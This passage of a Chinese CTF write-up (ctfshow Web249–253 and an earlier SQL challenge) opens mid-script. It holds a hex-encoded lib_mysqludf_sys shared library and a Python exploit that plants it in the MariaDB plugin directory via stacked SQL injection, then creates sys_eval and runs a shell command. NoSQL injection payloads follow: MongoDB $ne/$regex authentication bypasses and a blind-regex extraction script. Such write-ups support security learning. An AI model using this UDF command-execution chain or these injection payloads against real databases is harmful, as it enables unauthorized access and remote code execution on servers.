807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400"
for i in range(0,21510, 5000):
end = i + 5000
payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t) #UDF提权一般配合dumpfile 而不是outfile
r = requests.get(url)
print(r.status_code)

next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'-- +&page=1&limit=10" #将各个txt文件合并到udf.so
rn = requests.get(next_url)

uaf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"#创建udf函数
r=requests.get(uaf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');-- +&page=1&limit=10"#执行命令并查看
rnn = requests.get(nn_url)
print(rnn.text)

参考资料:

Web249——NoSQL注入(无过滤,数组绕过intval)

这一题考察的是NoSQL,之后再写一篇文章阐述(挖坑++;)

image-20220201204208790

这题过滤了非数字字符,可能利用了intval()函数,利用数组绕过即可

1
/api/?id[]=flag

参考资料:

Web250——NoSQL注入(MongoDB重言式注入)

MongoDB是NOSQL的一种,介绍一下Mongodb得两个操作符:
$ne:!= 不等于
$regex:正则匹配

这里也是直接给出payload:

1
username[$ne]=1&password[$ne]=1

参考资料:

Web251——NoSQL注入(正则)

payload如下:

1
username[$regex]=.&password[$regex]=1

Web252——NoSQL注入(正则)

payload如下:

1
username[$ne]=admin&password[$ne]=1
1
username[$ne]=admin&password[$ne]=ctfshow666nnneeaaabbbcc
1
username[$regex]=^[^a].*$&password[$ne]=1

Web253——NoSQL注入(盲注)

有点像盲注的NoSQL,直接给出exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests

url = "http://3c1774d8-cb79-44ad-8ee9-333479ffd820.challenge.ctf.show/api/"
letter = "-ctfshow-0123456789abde{,}"
flag = ""
for i in range(1, 100):
for j in letter:
payload = "^{}.*$".format(flag + j)
data = {
"username[$regex]": "flag",
"password[$regex]": payload
}
res = requests.post(url, data).text
if r"\u767b\u9646\u5931\u8d25" not in res:
flag += j
print(flag)
break

if j == "}":
print(flag + "--OUT")
exit()

By: Lxxx